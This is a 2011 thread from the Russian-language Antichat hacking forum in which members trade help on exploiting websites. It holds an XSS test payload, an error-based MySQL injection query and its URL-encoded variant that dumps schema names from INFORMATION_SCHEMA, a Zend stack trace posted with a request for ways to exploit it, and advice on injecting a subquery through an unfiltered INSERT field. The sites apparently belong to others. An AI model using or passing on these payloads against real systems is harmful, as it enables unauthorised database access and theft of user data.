ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.03.2011, 16:03
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759
Репутация:
-9
|
|
Сообщение от Isis
Isis said:
Да ничего, обычный вывод в тайтл.
Попробуй ввести туда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"](/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/)[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR]
Может xss будет там защита от xss
|
|
|
20.03.2011, 16:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от [R
eD"]
[R]eD said:
теперь не хаватает прав ((
видимо больше способов нету (
в пм скинь
|
|
|
|
20.03.2011, 20:27
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от KREGI
KREGI said:
хм, а что же?
С чего же ты взял, что если запрос выводиться в title, то там SQLi?
|
|
|
|
20.03.2011, 23:39
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759
Репутация:
-9
|
|
Сообщение от Tigger
Tigger said:
С чего же ты взял, что если запрос выводиться в title, то там SQLi?
ну не только в титл... помню просто читал про похожую скулю на дле... вот и подумалось...
|
|
|
|
20.03.2011, 23:55
|
|
Новичок
Регистрация: 14.06.2007
Сообщений: 5
Провел на форуме:
3534
Репутация:
0
|
|
Подскажите что за ошибка, каким способом можно раскрутить?
An error occurred
Page not found
Exception information:
Message: Invalid controller specified (about')
Stack trace:
#0 /opt/http/www/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /opt/http/www/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /opt/http/www/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /opt/http/www/public/index.php(27): Zend_Application->run()
#4 {main}Request Parameters:
array (
'controller' => 'about\'',
'action' => 'union',
'select' => '1',
'module' => 'default',
)
|
|
|
|
20.03.2011, 23:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
23579
Репутация:
-5
|
|
SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --
как получить group_concat(TABLE_SCHEMA) from information_schema.tables?
|
|
|
|
21.03.2011, 00:11
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от rootmd
rootmd said:
SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --
как получить group_concat(TABLE_SCHEMA) from information_schema.tables?
Код HTML:
HTML:
-1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((SELECT+GROUP_CONCAT(SCHEMA_NAME)+FROM+INFORMATION_SCHEMA.SCHEMATA),1,63),FLOOR(RAND(0)*2)))
|
|
|
|
21.03.2011, 21:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
1184
Репутация:
0
|
|
Всем привет! Есть такая таблица на сервере.
Код:
Code:
CREATE TABLE IF NOT EXISTS `login` (
`id` int(11) unsigned NOT NULL auto_increment,
`userid` varchar(23) NOT NULL default '',
`user_pass` varchar(23) NOT NULL default '',
`mode` enum('one','two') NOT NULL default 'one',
`email` varchar(39) NOT NULL default '',
PRIMARY KEY (`id`),
KEY `name` (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=1000000;
И примерно такой SQL запрос:
Сообщение от None
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', 'one', 'root@myhost.com')
При регистрации на сайте не фильтруется поле "mode":
Сообщение от None
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')
Возможно к уязвимому запросу добавить свой запрос?
Я пробовал подставить "two','root@myhost.com'); SELECT * FROM `login`; -- ", но получил ошибку:
Сообщение от None
Ошибка MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM `login`; -- ', 'root@myhost.com')' at line 1
Какие возможности открывает данная уязвимость? |
|
|
|
21.03.2011, 21:32
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Dynamic
/showpost.php?p=2582303&postcount=16477
|
|
|
|
21.03.2011, 21:37
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от Dynamic
Dynamic said:
Возможно к уязвимому запросу добавить свой запрос?
Я пробовал подставить
"two','root@myhost.com'); SELECT * FROM `login`; -- "
, но получил ошибку
Таким запросом вы никогда ничего и не добъетесь. Ну кроме ошибки.
Сообщение от Dynamic
Dynamic said:
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')
Предположим что поле email выбирается из базы где-то, то тогда в уязвимый параметр вводи:
', подзапрос)-- 1
Иначе можно спровоцировать ошибку, тоже много вариантов.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
